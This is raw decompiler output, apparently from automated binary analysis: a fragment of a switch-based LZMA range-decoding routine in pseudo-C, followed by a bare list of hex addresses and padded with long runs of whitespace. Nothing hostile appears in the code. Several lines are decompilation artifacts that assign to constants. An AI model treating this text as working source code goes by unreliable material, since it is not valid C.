                                                                                                                                                                                                              							__eax =  *(__ebp - 0x58);
                                                                                                                                                                                                              							__edx = __ebx + __ebx;
                                                                                                                                                                                                              							__ecx =  *(__ebp - 0x10);
                                                                                                                                                                                                              							__esi = __edx + __eax;
                                                                                                                                                                                                              							__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                                                                                                                                                              							__ax =  *__esi;
                                                                                                                                                                                                              							 *(__ebp - 0x54) = __esi;
                                                                                                                                                                                                              							__edi = __ax & 0x0000ffff;
                                                                                                                                                                                                              							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                                                                                                                                              							__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                                                                              							if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                                                                                                              								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                                                                                                              								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                                                                              								__cx = __ax;
                                                                                                                                                                                                              								_t217 = __edx + 1; // 0x1
                                                                                                                                                                                                              								__ebx = _t217;
                                                                                                                                                                                                              								__cx = __ax >> 5;
                                                                                                                                                                                                              								__eflags = __eax;
                                                                                                                                                                                                              								 *__esi = __ax;
                                                                                                                                                                                                              							} else {
                                                                                                                                                                                                              								 *(__ebp - 0x10) = __ecx;
                                                                                                                                                                                                              								0x800 = 0x800 - __edi;
                                                                                                                                                                                                              								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                                                                                                                                              								__ebx = __ebx + __ebx;
                                                                                                                                                                                                              								 *__esi = __cx;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                                                                                                              							 *(__ebp - 0x44) = __ebx;
                                                                                                                                                                                                              							if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                                                                                                              								goto L60;
                                                                                                                                                                                                              							} else {
                                                                                                                                                                                                              								goto L58;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              						case 0x10:
                                                                                                                                                                                                              							L109:
                                                                                                                                                                                                              							__eflags =  *(__ebp - 0x6c);
                                                                                                                                                                                                              							if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                                                                              								 *(__ebp - 0x88) = 0x10;
                                                                                                                                                                                                              								goto L170;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							__ecx =  *(__ebp - 0x70);
                                                                                                                                                                                                              							__eax =  *(__ebp - 0xc);
                                                                                                                                                                                                              							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                                                                              							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                              							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                                                                              							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                              							_t365 = __ebp - 0x70;
                                                                                                                                                                                                              							 *_t365 =  *(__ebp - 0x70) + 1;
                                                                                                                                                                                                              							__eflags =  *_t365;
                                                                                                                                                                                                              							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                              							goto L111;
                                                                                                                                                                                                              						case 0x11:
                                                                                                                                                                                                              							goto L69;
                                                                                                                                                                                                              						case 0x12:
                                                                                                                                                                                                              							__eflags =  *(__ebp - 0x40);
                                                                                                                                                                                                              							if( *(__ebp - 0x40) != 0) {
                                                                                                                                                                                                              								__eax =  *(__ebp - 0x58);
                                                                                                                                                                                                              								 *(__ebp - 0x84) = 0x13;
                                                                                                                                                                                                              								__esi =  *(__ebp - 0x58) + 2;
                                                                                                                                                                                                              								goto L132;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							__eax =  *(__ebp - 0x4c);
                                                                                                                                                                                                              							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                                                                                                                                                                                              							__ecx =  *(__ebp - 0x58);
                                                                                                                                                                                                              							__eax =  *(__ebp - 0x4c) << 4;
                                                                                                                                                                                                              							__eflags = __eax;
                                                                                                                                                                                                              							__eax =  *(__ebp - 0x58) + __eax + 4;
                                                                                                                                                                                                              							goto L130;
                                                                                                                                                                                                              						case 0x13:
                                                                                                                                                                                                              							__eflags =  *(__ebp - 0x40);
                                                                                                                                                                                                              							if( *(__ebp - 0x40) != 0) {
                                                                                                                                                                                                              								_t469 = __ebp - 0x58;
                                                                                                                                                                                                              								 *_t469 =  *(__ebp - 0x58) + 0x204;
                                                                                                                                                                                                              								__eflags =  *_t469;
                                                                                                                                                                                                              								 *(__ebp - 0x30) = 0x10;
                                                                                                                                                                                                              								 *(__ebp - 0x40) = 8;
                                                                                                                                                                                                              								L144:
                                                                                                                                                                                                              								 *(__ebp - 0x7c) = 0x14;
                                                                                                                                                                                                              								goto L145;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							__eax =  *(__ebp - 0x4c);
                                                                                                                                                                                                              							__ecx =  *(__ebp - 0x58);
                                                                                                                                                                                                              							__eax =  *(__ebp - 0x4c) << 4;
                                                                                                                                                                                                              							 *(__ebp - 0x30) = 8;
                                                                                                                                                                                                              							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                                                                                                                                                                                              							L130:
                                                                                                                                                                                                              							 *(__ebp - 0x58) = __eax;
                                                                                                                                                                                                              							 *(__ebp - 0x40) = 3;
                                                                                                                                                                                                              							goto L144;
                                                                                                                                                                                                              						case 0x14:
                                                                                                                                                                                                              							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                                                                                                                                                                                              							__eax =  *(__ebp - 0x80);
                                                                                                                                                                                                              							goto L140;
                                                                                                                                                                                                              						case 0x15:
                                                                                                                                                                                                              							__eax = 0;
                                                                                                                                                                                                              							__eflags =  *(__ebp - 0x38) - 7;
                                                                                                                                                                                                              							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                                                                                                                                                              							__al = __al & 0x000000fd;
                                                                                                                                                                                                              							__eax = (__eflags >= 0) - 1 + 0xb;
                                                                                                                                                                                                              							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                                                                                                                                                                                              							goto L120;
                                                                                                                                                                                                              						case 0x16:
                                                                                                                                                                                                              							__eax =  *(__ebp - 0x30);
                                                                                                                                                                                                              							__eflags = __eax - 4;
                                                                                                                                                                                                              							if(__eax >= 4) {
                                                                                                                                                                                                              								_push(3);
                                                                                                                                                                                                              								_pop(__eax);
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							__ecx =  *(__ebp - 4);
                                                                                                                                                                                                              							 *(__ebp - 0x40) = 6;
                                                                                                                                                                                                              							__eax = __eax << 7;
                                                                                                                                                                                                              							 *(__ebp - 0x7c) = 0x19;
                                                                                                                                                                                                              							 *(__ebp - 0x58) = __eax;
                                                                                                                                                                                                              							goto L145;
                                                                                                                                                                                                              						case 0x17:
                                                                                                                                                                                                              							L145:
                                                                                                                                                                                                              							__eax =  *(__ebp - 0x40);
                                                                                                                                                                                                              							 *(__ebp - 0x50) = 1;
                                                                                                                                                                                                              							 *(__ebp - 0x48) =  *(__ebp - 0x40);
                                                                                                                                                                                                              							goto L149;
                                                                                                                                                                                                              						case 0x18:
                                                                                                                                                                                                              							L146:
                                                                                                                                                                                                              							__eflags =  *(__ebp - 0x6c);
                                                                                                                                                                                                              							if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                                                                              								 *(__ebp - 0x88) = 0x18;
                                                                                                                                                                                                              								goto L170;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							__ecx =  *(__ebp - 0x70);
                                                                                                                                                                                                              							__eax =  *(__ebp - 0xc);
                                                                                                                                                                                                              							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                                                                              							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                              							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                                                                              							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                              							_t484 = __ebp - 0x70;
                                                                                                                                                                                                              							 *_t484 =  *(__ebp - 0x70) + 1;
                                                                                                                                                                                                              							__eflags =  *_t484;
                                                                                                                                                                                                              							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                              							L148:
                                                                                                                                                                                                              							_t487 = __ebp - 0x48;
                                                                                                                                                                                                              							 *_t487 =  *(__ebp - 0x48) - 1;
                                                                                                                                                                                                              							__eflags =  *_t487;
                                                                                                                                                                                                              							L149:
                                                                                                                                                                                                              							__eflags =  *(__ebp - 0x48);
                                                                                                                                                                                                              							if( *(__ebp - 0x48) <= 0) {
                                                                                                                                                                                                              								__ecx =  *(__ebp - 0x40);
                                                                                                                                                                                                              								__ebx =  *(__ebp - 0x50);
                                                                                                                                                                                                              								0 = 1;
                                                                                                                                                                                                              								__eax = 1 << __cl;
                                                                                                                                                                                                              								__ebx =  *(__ebp - 0x50) - (1 << __cl);
                                                                                                                                                                                                              								__eax =  *(__ebp - 0x7c);
                                                                                                                                                                                                              								 *(__ebp - 0x44) = __ebx;
                                                                                                                                                                                                              								goto L140;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							__eax =  *(__ebp - 0x50);
                                                                                                                                                                                                              							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                                                                                                                                              							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                                                                                                                                                                              							__eax =  *(__ebp - 0x58);
                                                                                                                                                                                                              							__esi = __edx + __eax;
                                                                                                                                                                                                              							 *(__ebp - 0x54) = __esi;
                                                                                                                                                                                                              							__ax =  *__esi;
                                                                                                                                                                                                              							__edi = __ax & 0x0000ffff;
                                                                                                                                                                                                              							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                                                                                                                                              							__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                                                                              							if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                                                                                                              								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                                                                                                              								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                                                                              								__cx = __ax;
                                                                                                                                                                                                              								__cx = __ax >> 5;
                                                                                                                                                                                                              								__eax = __eax - __ecx;
                                                                                                                                                                                                              								__edx = __edx + 1;
                                                                                                                                                                                                              								__eflags = __edx;
                                                                                                                                                                                                              								 *__esi = __ax;
                                                                                                                                                                                                              								 *(__ebp - 0x50) = __edx;
                                                                                                                                                                                                              							} else {
                                                                                                                                                                                                              								 *(__ebp - 0x10) = __ecx;
                                                                                                                                                                                                              								0x800 = 0x800 - __edi;
                                                                                                                                                                                                              								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                                                                                                                                              								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                                                                                                                                                                              								 *__esi = __cx;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                                                                                                              							if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                                                                                                              								goto L148;
                                                                                                                                                                                                              							} else {
                                                                                                                                                                                                              								goto L146;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              						case 0x19:
                                                                                                                                                                                                              							__eflags = __ebx - 4;
                                                                                                                                                                                                              							if(__ebx < 4) {
                                                                                                                                                                                                              								 *(__ebp - 0x2c) = __ebx;
                                                                                                                                                                                                              								L119:
                                                                                                                                                                                                              								_t393 = __ebp - 0x2c;
                                                                                                                                                                                                              								 *_t393 =  *(__ebp - 0x2c) + 1;
                                                                                                                                                                                                              								__eflags =  *_t393;
                                                                                                                                                                                                              								L120:
                                                                                                                                                                                                              								__eax =  *(__ebp - 0x2c);
                                                                                                                                                                                                              								__eflags = __eax;
                                                                                                                                                                                                              								if(__eax == 0) {
                                                                                                                                                                                                              									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                                                                                                                                                                                              									goto L170;
                                                                                                                                                                                                              								}
                                                                                                                                                                                                              								__eflags = __eax -  *(__ebp - 0x60);
                                                                                                                                                                                                              								if(__eax >  *(__ebp - 0x60)) {
                                                                                                                                                                                                              									goto L171;
                                                                                                                                                                                                              								}
                                                                                                                                                                                                              								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                                                                                                                                                                                              								__eax =  *(__ebp - 0x30);
                                                                                                                                                                                                              								_t400 = __ebp - 0x60;
                                                                                                                                                                                                              								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                                                                                                                                                                                              								__eflags =  *_t400;
                                                                                                                                                                                                              								goto L123;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							__ecx = __ebx;
                                                                                                                                                                                                              							__eax = __ebx;
                                                                                                                                                                                                              							__ecx = __ebx >> 1;
                                                                                                                                                                                                              							__eax = __ebx & 0x00000001;
                                                                                                                                                                                                              							__ecx = (__ebx >> 1) - 1;
                                                                                                                                                                                                              							__al = __al | 0x00000002;
                                                                                                                                                                                                              							__eax = (__ebx & 0x00000001) << __cl;
                                                                                                                                                                                                              							__eflags = __ebx - 0xe;
                                                                                                                                                                                                              							 *(__ebp - 0x2c) = __eax;
                                                                                                                                                                                                              							if(__ebx >= 0xe) {
                                                                                                                                                                                                              								__ebx = 0;
                                                                                                                                                                                                              								 *(__ebp - 0x48) = __ecx;
                                                                                                                                                                                                              								L102:
                                                                                                                                                                                                              								__eflags =  *(__ebp - 0x48);
                                                                                                                                                                                                              								if( *(__ebp - 0x48) <= 0) {
                                                                                                                                                                                                              									__eax = __eax + __ebx;
                                                                                                                                                                                                              									 *(__ebp - 0x40) = 4;
                                                                                                                                                                                                              									 *(__ebp - 0x2c) = __eax;
                                                                                                                                                                                                              									__eax =  *(__ebp - 4);
                                                                                                                                                                                                              									__eax =  *(__ebp - 4) + 0x644;
                                                                                                                                                                                                              									__eflags = __eax;
                                                                                                                                                                                                              									L108:
                                                                                                                                                                                                              									__ebx = 0;
                                                                                                                                                                                                              									 *(__ebp - 0x58) = __eax;
                                                                                                                                                                                                              									 *(__ebp - 0x50) = 1;
                                                                                                                                                                                                              									 *(__ebp - 0x44) = 0;
                                                                                                                                                                                                              									 *(__ebp - 0x48) = 0;
                                                                                                                                                                                                              									L112:
                                                                                                                                                                                                              									__eax =  *(__ebp - 0x40);
                                                                                                                                                                                                              									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                                                                                                                                                              									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                                                                                                                                                                                              										_t391 = __ebp - 0x2c;
                                                                                                                                                                                                              										 *_t391 =  *(__ebp - 0x2c) + __ebx;
                                                                                                                                                                                                              										__eflags =  *_t391;
                                                                                                                                                                                                              										goto L119;
                                                                                                                                                                                                              									}
                                                                                                                                                                                                              									__eax =  *(__ebp - 0x50);
                                                                                                                                                                                                              									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                                                                                                                                              									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                                                                                                                                                                              									__eax =  *(__ebp - 0x58);
                                                                                                                                                                                                              									__esi = __edi + __eax;
                                                                                                                                                                                                              									 *(__ebp - 0x54) = __esi;
                                                                                                                                                                                                              									__ax =  *__esi;
                                                                                                                                                                                                              									__ecx = __ax & 0x0000ffff;
                                                                                                                                                                                                              									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                                                                                                                                                                                              									__eflags =  *(__ebp - 0xc) - __edx;
                                                                                                                                                                                                              									if( *(__ebp - 0xc) >= __edx) {
                                                                                                                                                                                                              										__ecx = 0;
                                                                                                                                                                                                              										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                                                                                                                                                                                              										__ecx = 1;
                                                                                                                                                                                                              										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                                                                                                                                                                                              										__ebx = 1;
                                                                                                                                                                                                              										__ecx =  *(__ebp - 0x48);
                                                                                                                                                                                                              										__ebx = 1 << __cl;
                                                                                                                                                                                                              										__ecx = 1 << __cl;
                                                                                                                                                                                                              										__ebx =  *(__ebp - 0x44);
                                                                                                                                                                                                              										__ebx =  *(__ebp - 0x44) | __ecx;
                                                                                                                                                                                                              										__cx = __ax;
                                                                                                                                                                                                              										__cx = __ax >> 5;
                                                                                                                                                                                                              										__eax = __eax - __ecx;
                                                                                                                                                                                                              										__edi = __edi + 1;
                                                                                                                                                                                                              										__eflags = __edi;
                                                                                                                                                                                                              										 *(__ebp - 0x44) = __ebx;
                                                                                                                                                                                                              										 *__esi = __ax;
                                                                                                                                                                                                              										 *(__ebp - 0x50) = __edi;
                                                                                                                                                                                                              									} else {
                                                                                                                                                                                                              										 *(__ebp - 0x10) = __edx;
                                                                                                                                                                                                              										0x800 = 0x800 - __ecx;
                                                                                                                                                                                                              										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                                                                                                                                                                                              										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                                                                                                                                                                              										 *__esi = __dx;
                                                                                                                                                                                                              									}
                                                                                                                                                                                                              									__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                                                                                                              									if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                                                                                                              										L111:
                                                                                                                                                                                                              										_t368 = __ebp - 0x48;
                                                                                                                                                                                                              										 *_t368 =  *(__ebp - 0x48) + 1;
                                                                                                                                                                                                              										__eflags =  *_t368;
                                                                                                                                                                                                              										goto L112;
                                                                                                                                                                                                              									} else {
                                                                                                                                                                                                              										goto L109;
                                                                                                                                                                                                              									}
                                                                                                                                                                                                              								}
                                                                                                                                                                                                              								__ecx =  *(__ebp - 0xc);
                                                                                                                                                                                                              								__ebx = __ebx + __ebx;
                                                                                                                                                                                                              								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                                                                                                                                                                                              								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                                                                                                                                                                              								 *(__ebp - 0x44) = __ebx;
                                                                                                                                                                                                              								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                                                                                                                                                                                              									__ecx =  *(__ebp - 0x10);
                                                                                                                                                                                                              									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                                                                                                                                                                              									__ebx = __ebx | 0x00000001;
                                                                                                                                                                                                              									__eflags = __ebx;
                                                                                                                                                                                                              									 *(__ebp - 0x44) = __ebx;
                                                                                                                                                                                                              								}
                                                                                                                                                                                                              								__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                                                                                                              								if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                                                                                                              									L101:
                                                                                                                                                                                                              									_t338 = __ebp - 0x48;
                                                                                                                                                                                                              									 *_t338 =  *(__ebp - 0x48) - 1;
                                                                                                                                                                                                              									__eflags =  *_t338;
                                                                                                                                                                                                              									goto L102;
                                                                                                                                                                                                              								} else {
                                                                                                                                                                                                              									goto L99;
                                                                                                                                                                                                              								}
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							__edx =  *(__ebp - 4);
                                                                                                                                                                                                              							__eax = __eax - __ebx;
                                                                                                                                                                                                              							 *(__ebp - 0x40) = __ecx;
                                                                                                                                                                                                              							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                                                                                                                                                                                                              							goto L108;
                                                                                                                                                                                                              						case 0x1a:
                                                                                                                                                                                                              							L56:
                                                                                                                                                                                                              							__eflags =  *(__ebp - 0x64);
                                                                                                                                                                                                              							if( *(__ebp - 0x64) == 0) {
                                                                                                                                                                                                              								 *(__ebp - 0x88) = 0x1a;
                                                                                                                                                                                                              								goto L170;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							__ecx =  *(__ebp - 0x68);
                                                                                                                                                                                                              							__al =  *(__ebp - 0x5c);
                                                                                                                                                                                                              							__edx =  *(__ebp - 8);
                                                                                                                                                                                                              							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                                                                                                                                                                              							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                                                                                                                                              							 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                                                                                                                                                                              							 *( *(__ebp - 0x68)) = __al;
                                                                                                                                                                                                              							__ecx =  *(__ebp - 0x14);
                                                                                                                                                                                                              							 *(__ecx +  *(__ebp - 8)) = __al;
                                                                                                                                                                                                              							__eax = __ecx + 1;
                                                                                                                                                                                                              							__edx = 0;
                                                                                                                                                                                                              							_t192 = __eax %  *(__ebp - 0x74);
                                                                                                                                                                                                              							__eax = __eax /  *(__ebp - 0x74);
                                                                                                                                                                                                              							__edx = _t192;
                                                                                                                                                                                                              							goto L79;
                                                                                                                                                                                                              						case 0x1b:
                                                                                                                                                                                                              							goto L75;
                                                                                                                                                                                                              						case 0x1c:
                                                                                                                                                                                                              							while(1) {
                                                                                                                                                                                                              								L123:
                                                                                                                                                                                                              								__eflags =  *(__ebp - 0x64);
                                                                                                                                                                                                              								if( *(__ebp - 0x64) == 0) {
                                                                                                                                                                                                              									break;
                                                                                                                                                                                                              								}
                                                                                                                                                                                                              								__eax =  *(__ebp - 0x14);
                                                                                                                                                                                                              								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                                                                                                                                              								__eflags = __eax -  *(__ebp - 0x74);
                                                                                                                                                                                                              								if(__eax >=  *(__ebp - 0x74)) {
                                                                                                                                                                                                              									__eax = __eax +  *(__ebp - 0x74);
                                                                                                                                                                                                              									__eflags = __eax;
                                                                                                                                                                                                              								}
                                                                                                                                                                                                              								__edx =  *(__ebp - 8);
                                                                                                                                                                                                              								__cl =  *(__eax + __edx);
                                                                                                                                                                                                              								__eax =  *(__ebp - 0x14);
                                                                                                                                                                                                              								 *(__ebp - 0x5c) = __cl;
                                                                                                                                                                                                              								 *(__eax + __edx) = __cl;
                                                                                                                                                                                                              								__eax = __eax + 1;
                                                                                                                                                                                                              								__edx = 0;
                                                                                                                                                                                                              								_t414 = __eax %  *(__ebp - 0x74);
                                                                                                                                                                                                              								__eax = __eax /  *(__ebp - 0x74);
                                                                                                                                                                                                              								__edx = _t414;
                                                                                                                                                                                                              								__eax =  *(__ebp - 0x68);
                                                                                                                                                                                                              								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                                                                                                                                              								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                                                                                                                                                                              								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                                                                                                                                                                                                              								__eflags =  *(__ebp - 0x30);
                                                                                                                                                                                                              								 *( *(__ebp - 0x68)) = __cl;
                                                                                                                                                                                                              								 *(__ebp - 0x14) = _t414;
                                                                                                                                                                                                              								if( *(__ebp - 0x30) > 0) {
                                                                                                                                                                                                              									continue;
                                                                                                                                                                                                              								} else {
                                                                                                                                                                                                              									goto L80;
                                                                                                                                                                                                              								}
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							 *(__ebp - 0x88) = 0x1c;
                                                                                                                                                                                                              							goto L170;
                                                                                                                                                                                                              					}
                                                                                                                                                                                                              				}
                                                                                                                                                                                                              			}













                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00406c71
                                                                                                                                                                                                              0x00406c71
                                                                                                                                                                                                              0x00406c75
                                                                                                                                                                                                              0x00406d2c
                                                                                                                                                                                                              0x00406d2f
                                                                                                                                                                                                              0x00406d3b
                                                                                                                                                                                                              0x00406c1c
                                                                                                                                                                                                              0x00406c1c
                                                                                                                                                                                                              0x00406c1f
                                                                                                                                                                                                              0x00406f91
                                                                                                                                                                                                              0x00406f91
                                                                                                                                                                                                              0x00406f94
                                                                                                                                                                                                              0x00406f94
                                                                                                                                                                                                              0x00406f9a
                                                                                                                                                                                                              0x00406fa0
                                                                                                                                                                                                              0x00406fa6
                                                                                                                                                                                                              0x00406fc0
                                                                                                                                                                                                              0x00406fc3
                                                                                                                                                                                                              0x00406fc9
                                                                                                                                                                                                              0x00406fd4
                                                                                                                                                                                                              0x00406fd6
                                                                                                                                                                                                              0x00406fa8
                                                                                                                                                                                                              0x00406fa8
                                                                                                                                                                                                              0x00406fb7
                                                                                                                                                                                                              0x00406fbb
                                                                                                                                                                                                              0x00406fbb
                                                                                                                                                                                                              0x00406fe0
                                                                                                                                                                                                              0x00407007
                                                                                                                                                                                                              0x00407007
                                                                                                                                                                                                              0x0040700d
                                                                                                                                                                                                              0x0040700d
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00406fe2
                                                                                                                                                                                                              0x00406fe2
                                                                                                                                                                                                              0x00406fe6
                                                                                                                                                                                                              0x00407195
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00407195
                                                                                                                                                                                                              0x00406ff2
                                                                                                                                                                                                              0x00406ff9
                                                                                                                                                                                                              0x00407001
                                                                                                                                                                                                              0x00407004
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00407004
                                                                                                                                                                                                              0x00406c7b
                                                                                                                                                                                                              0x00406c7f
                                                                                                                                                                                                              0x004071c0
                                                                                                                                                                                                              0x004071c0
                                                                                                                                                                                                              0x004071c3
                                                                                                                                                                                                              0x004071c7
                                                                                                                                                                                                              0x004071c7
                                                                                                                                                                                                              0x00406c85
                                                                                                                                                                                                              0x00406c8b
                                                                                                                                                                                                              0x00406c8e
                                                                                                                                                                                                              0x00406c92
                                                                                                                                                                                                              0x00406c95
                                                                                                                                                                                                              0x00406c99
                                                                                                                                                                                                              0x0040715f
                                                                                                                                                                                                              0x004071ab
                                                                                                                                                                                                              0x004071b3
                                                                                                                                                                                                              0x004071ba
                                                                                                                                                                                                              0x004071bc
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x004071bc
                                                                                                                                                                                                              0x00406c9f
                                                                                                                                                                                                              0x00406ca2
                                                                                                                                                                                                              0x00406ca8
                                                                                                                                                                                                              0x00406caa
                                                                                                                                                                                                              0x00406caa
                                                                                                                                                                                                              0x00406cad
                                                                                                                                                                                                              0x00406cb0
                                                                                                                                                                                                              0x00406cb3
                                                                                                                                                                                                              0x00406cb6
                                                                                                                                                                                                              0x00406cb9
                                                                                                                                                                                                              0x00406cbc
                                                                                                                                                                                                              0x00406cbd
                                                                                                                                                                                                              0x00406cbf
                                                                                                                                                                                                              0x00406cbf
                                                                                                                                                                                                              0x00406cbf
                                                                                                                                                                                                              0x00406cc2
                                                                                                                                                                                                              0x00406cc5
                                                                                                                                                                                                              0x00406cc8
                                                                                                                                                                                                              0x00406ccb
                                                                                                                                                                                                              0x00406ccb
                                                                                                                                                                                                              0x00406cce
                                                                                                                                                                                                              0x00406cd0
                                                                                                                                                                                                              0x00406cd0
                                                                                                                                                                                                              0x00406cd3
                                                                                                                                                                                                              0x00406cd3
                                                                                                                                                                                                              0x00406cd3
                                                                                                                                                                                                              0x004067a9
                                                                                                                                                                                                              0x004067a9
                                                                                                                                                                                                              0x004067b2
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x004067b8
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x004067c3
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x004067cc
                                                                                                                                                                                                              0x004067cf
                                                                                                                                                                                                              0x004067d2
                                                                                                                                                                                                              0x004067d6
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x004067dc
                                                                                                                                                                                                              0x004067df
                                                                                                                                                                                                              0x004067e1
                                                                                                                                                                                                              0x004067e2
                                                                                                                                                                                                              0x004067e5
                                                                                                                                                                                                              0x004067e7
                                                                                                                                                                                                              0x004067e8
                                                                                                                                                                                                              0x004067ea
                                                                                                                                                                                                              0x004067ed
                                                                                                                                                                                                              0x004067f2
                                                                                                                                                                                                              0x004067f7
                                                                                                                                                                                                              0x00406800
                                                                                                                                                                                                              0x00406813
                                                                                                                                                                                                              0x00406816
                                                                                                                                                                                                              0x00406822
                                                                                                                                                                                                              0x0040684a
                                                                                                                                                                                                              0x0040684c
                                                                                                                                                                                                              0x0040685a
                                                                                                                                                                                                              0x0040685a
                                                                                                                                                                                                              0x0040685e
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x0040684e
                                                                                                                                                                                                              0x0040684e
                                                                                                                                                                                                              0x00406851
                                                                                                                                                                                                              0x00406852
                                                                                                                                                                                                              0x00406852
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x0040684e
                                                                                                                                                                                                              0x00406828
                                                                                                                                                                                                              0x0040682d
                                                                                                                                                                                                              0x0040682d
                                                                                                                                                                                                              0x00406836
                                                                                                                                                                                                              0x0040683e
                                                                                                                                                                                                              0x00406841
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00406847
                                                                                                                                                                                                              0x00406847
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00406847
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00406864
                                                                                                                                                                                                              0x00406864
                                                                                                                                                                                                              0x00406868
                                                                                                                                                                                                              0x00407114
                                                                                                                                                                                                              0x00000000
